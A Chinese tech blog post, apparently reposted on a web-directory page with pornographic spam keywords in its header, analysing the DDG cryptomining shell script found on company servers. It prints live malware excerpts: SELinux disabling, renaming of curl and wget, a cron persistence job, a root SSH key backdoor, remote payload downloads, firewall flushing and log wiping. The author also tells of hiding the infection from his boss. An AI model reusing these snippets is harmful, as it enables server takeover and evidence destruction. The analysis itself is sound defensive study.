波多野结衣 蜜桃视频,国产在线精品露脸ponn,a v麻豆成人,AV在线免费小电影

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

公司有幾臺機器,最近 CPU 一直在瘋轉,就像是吃了藥,一直在發熱。由于機器實在是太多,有這么幾臺安全性防護沒有到位,就一直躺在角落里瘋狂運轉。

一個“挖礦腳本”還能難得住我?

圖片來自 Pexels

直到統一的監控腳本接管了這幾臺機器,異常情況才得以浮出水面。最后發現了多個奇奇怪怪的進程,發現是一個挖礦腳本。

下載下來學習了一下,發現腳本的編寫者,有著較高的水平。雖然在別人機器進行挖礦行為是不道德的,但掩蓋不了腳本編寫者的風騷操作。

挖礦,是計算機技術界最讓人迷惑的行為之一,但它賺錢。據悉,這段腳本名叫 DDG,已經挖取了價值一千多萬人民幣的虛擬幣貨幣。

本著學習的目的,我稍微分析了一下這個神奇的腳本,也算是吸盡它的精華,為我所用。

這事我都沒敢告訴老板,因為說了他也不懂,反生事端。不過和大家交流一下還是可以的,因為你們懂啊。

01.Code 1

#!/bin/sh 

腳本的第一行,看起來是一行注釋,但其實并不是。它規定了接下來的腳本,將要采用哪一個 SHELL 執行。

像我們平常用的 bash、zsh 等,屬于 sh 的超集,這個腳本使用 sh 作為執行的 shell,具有更好的可移植性。

02.Code 2

setenforce 0 2>dev/null 
echo SElinux=disabled > /etc/sysconfig/selinux 2>/dev/null 

setenforce 是 Linux 的 selinux 防火墻配置命令,執行 setenforce 0 表示關閉 selinux 防火墻。2 代表的是標準錯誤(stderr)的意思。

所以后面,使用重定向符,將命令的錯誤輸出定向到 /dev/null 設備中。這個設備是一個虛擬設備,意思是什么都不干。非常適合靜悄悄的干壞事。

03.Code 3

sync && echo 3 >/proc/sys/vm/drop_caches 

腳本貼心的幫我們釋放了一些內存資源,以便獲取更多的資源進行挖礦。

眾所周知,Linux 系統會隨著長時間的運行,會產生很多緩存,清理方式就是寫一個數字到 drop_caches 文件里,這個數字通常為 3。

sync 命令將所有未寫的系統緩沖區寫到磁盤中,執行之后就可以放心的釋放緩存了。

04.Code 4

crondir='/var/spool/cron/'"$USER" 
cont=`cat ${crondir}` 
ssht=`cat /root/.ssh/authorized_keys` 
echo 1 > /etc/sysupdates 
rtdir="/etc/sysupdates" 
bbdir="/usr/bin/curl" 
bbdira="/usr/bin/cur" 
ccdir="/usr/bin/wget" 
ccdira="/usr/bin/wge" 
mv /usr/bin/wget /usr/bin/get 
mv /usr/bin/xget /usr/bin/get 
mv /usr/bin/get /usr/bin/wge 
mv /usr/bin/curl /usr/bin/url 
mv /usr/bin/xurl /usr/bin/url 
mv /usr/bin/url /usr/bin/cur 

沒錯,上面這些語句就是完成了一些普通的操作。值得注意的是,它把我們的一些常用命令,使用 mv 命令給重名了。

這在執行命令的時候,就會顯得分成功能的蛋疼。這腳本已經更改了計算機的一些文件,屬于犯罪的范疇了。

腳本為了復用一些功能,抽象出了很多的函數。我們直接跳到 main 函數的執行,然后看一下這個過程。

05.Code 5

首先是 kill_miner_proc 函數。代碼很長,就不全部貼出來了。

kill_miner_proc() 
{ 
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 
  ... 
    pkill -f bIOSetjenkins 
    pkill -f Loopback 
    ... 
    crontab -r 
    rm -rf /var/spool/cron/* 

挖礦領域是一個相愛相殺的領域。這個方法首先使用 ps、grep、kill 一套組合,干掉了同行的挖礦腳本,然后停掉了同行的 cron 腳本,黑吃黑的感覺。

在這段腳本里,使用了 pkill 命令。這個命令會終止進程,并按終端號踢出用戶,比較暴力。

06.Code 6

接下來執行的是 kill_sus_proc 函數。

ps axf -o "pid"|while read procid 
do 
... 
done 

ps 加上 o 參數,可以指定要輸出的列,在這里只輸出的進程的 pid,然后使用 read 函數,對 procid 進行遍歷操作。

07.Code 7

ls -l /proc/$procid/exe | grep /tmp 
if [ $? -ne 1 ] 
then 
... 
fi 

上面就是遍歷操作過程了,我們可以看到 if 語句的語法。其中 $? 指的是上一個命令的退出狀態。

0 表示沒有錯誤,其他任何值表明有錯誤。-ne 是不等于的意思,意思就是能夠匹配到 tmp 這個字符串。

08.Code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid 
do 
... 
done 

呵呵,上面又來了一次循環遍歷。不過這次針對的目標,是 CPU 使用超過 40% 的進程。這就有點狠了:影響我挖礦的進程,都得死!相煎何太急。

09.Code 9

再接下來,腳本針對不同的用戶屬性,進行了不同的操作。

首先是 root 用戶。通過判斷是否存在 $rtdir 文件,來確定是否是 root 權限。

chattr -i /etc/sysupdate* 
chattr -i /etc/config.json* 
chattr -i /etc/update.sh* 
chattr -i /root/.ssh/authorized_keys* 
chattr -i /etc/networkservice 

使用 chattr 命令,把一些重要的文件,搞成不能任意改動的只讀屬性,也是夠損的。然后,操作 cron 程序,把腳本的更新服務加入到定時中。

就是下面這段腳本。

10.Code 10

if [ ! -f "/usr/bin/crontab" ] 
then 
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} 
else 
    [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - 
fi 

注意 [[ $cont =~ "update.sh" ]] 這以小段代碼,怪異的很。[[ ]] 是 shell 中內置的一個命令,支持字符串的模式匹配。

使用 =~ 的時候,甚至支持 shell 的正則表達式,強大的令人發指。它的輸出結果是一個 bool 類型,所以能夠使用||進行拼接。

而后面的單小括號 (),是的是一個命令組,括號中多個命令之間用分號隔開,最后一個命令可以沒有分號;和 `cmd` 的效果基本是一樣的。

11.Code 11

搞完了定時任務,就要配置 ssh 自動登錄了,通過把公鑰追加到信任列表中就可以。

chmod 700 /root/.ssh/ 
echo >> /root/.ssh/authorized_keys 
chmod 600 root/.ssh/authorized_keys 
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/                         

12.Code 12

說曹操曹操就到,下面的腳本就使用了 `` 進行操作。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` 
if [ "$filesize_config" -ne "$config_size" ] 
then 
    pkill -f sysupdate 
    rm /etc/config.json 
    downloads $config_url /etc/config.json $config_url_backup 
else 
    echo "no need download" 
fi    

通過一系列騷操作,獲取到配置文件的大小,如果判斷文件大小不一致,那么就重新下載一個。這就用到了 downloads 函數。

shell 中的函數,看起來比較怪異,后面的參數傳遞,就像是腳本傳遞一樣,傳送給函數。

13.Code 13

downloads $config_url /etc/config.json $config_url_backup 

這句話,就傳遞了三個參數。當然,文件要從遙遠的服務器上下載。域名是 .de 結尾的,證明是個德國的域名,其他的我們一無所知。

downloads() 
{ 
    if [ -f "/usr/bin/curl" ] 
    then 
    echo $1,$2 
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` 
        if [ "$http_code" -eq "200" ] 
        then 
            curl --connect-timeout 10 --retry 100 $1 > $2 
        elif [ "$http_code" -eq "405" ] 
        then 
            curl --connect-timeout 10 --retry 100 $1 > $2 
        else 
            curl --connect-timeout 10 --retry 100 $3 > $2 
        fi 
    elif [ -f "/usr/bin/cur" ] 
    then 
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` 
        if [ "$http_code" -eq "200" ] 
        then 
            cur --connect-timeout 10 --retry 100 $1 > $2 
        elif [ "$http_code" -eq "405" ] 
        then 
            cur --connect-timeout 10 --retry 100 $1 > $2 
        else 
            cur --connect-timeout 10 --retry 100 $3 > $2 
fi 
    elif [ -f "/usr/bin/wget" ] 
    then 
        wget --timeout=10 --tries=100 -O $2 $1 
        if [ $? -ne 0 ] 
    then 
        wget --timeout=10 --tries=100 -O $2 $3 
        fi 
    elif [ -f "/usr/bin/wge" ] 
    then 
        wge --timeout=10 --tries=100 -O $2 $1 
        if [ $? -eq 0 ] 
        then 
            wge --timeout=10 --tries=100 -O $2 $3 
        fi 
    fi 
} 

我認為,這段代碼作者寫的又臭又長,完全沒有體現出自己應有的水平。應該是趕工期,沒有想好代碼的復用,才會寫的這么有失水準。

我們上面說到,腳本改了幾個命令的名字,其中就有 curl。這個命令是如此的強大,以至于腳本的作者都忍不住加了不少參數:

  • -I:用來測試 http 頭信息。
  • -m:設置最大傳輸時間。
  • -o:指定保持的文件名。這里是 /dev/null,呃呃呃......
  • -s:靜默模式,不輸出任何東西。
  • --connect-timeout:連接超時時間。
  • --retry:重試次數,好狠,100 次。

如果沒有 curl?那就使用替補的 wget,套路都是一樣的。

14.Code 14

接下來是一系列相似的操作,最后,對 iptables 一批操作。

iptables -F 
iptables -X 
iptables -A OUTPUT -p tcp --dport 3333 -j DROP 
iptables -A OUTPUT -p tcp --dport 5555 -j DROP 
iptables -A OUTPUT -p tcp --dport 7777 -j DROP 
iptables -A OUTPUT -p tcp --dport 9999 -j DROP 
iptables -I INPUT -s 43.245.222.57 -j DROP 
service iptables reload 

15.Code 15

細心的腳本編寫者,還使用命令清理了操作日志。

history -c 
echo > /var/spool/mail/root 
echo > /var/log/wtmp 
echo > /var/log/secure 
echo > /root/.bash_history 

不露死角,瀟灑走開??梢钥吹?,且不說真正的挖礦程序,僅僅是這個小腳本,作者也下足了功夫。

腳本里命令繁多,使用方式多樣,縮緊格式優雅,除了有一點啰嗦,沒有加密之外,是一個非常好的拿來學習的腳本。

瞧了瞧被控制的機器,我趕緊偷偷的重裝了機器。就當它是一個夢吧。老板問起的時候,什么都沒有發生過。

作者:小姐姐味道

簡介:聚焦基礎架構和 Linux。十年架構,日百億流量,與你探討高并發世界,給你不一樣的味道。個人微信 xjjdog0,歡迎添加好友,進一步交流。

編輯:陶家龍

出處:轉載自微信公眾號小姐姐味道(ID:xjjdog)

分享到:
標簽:腳本 挖礦
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定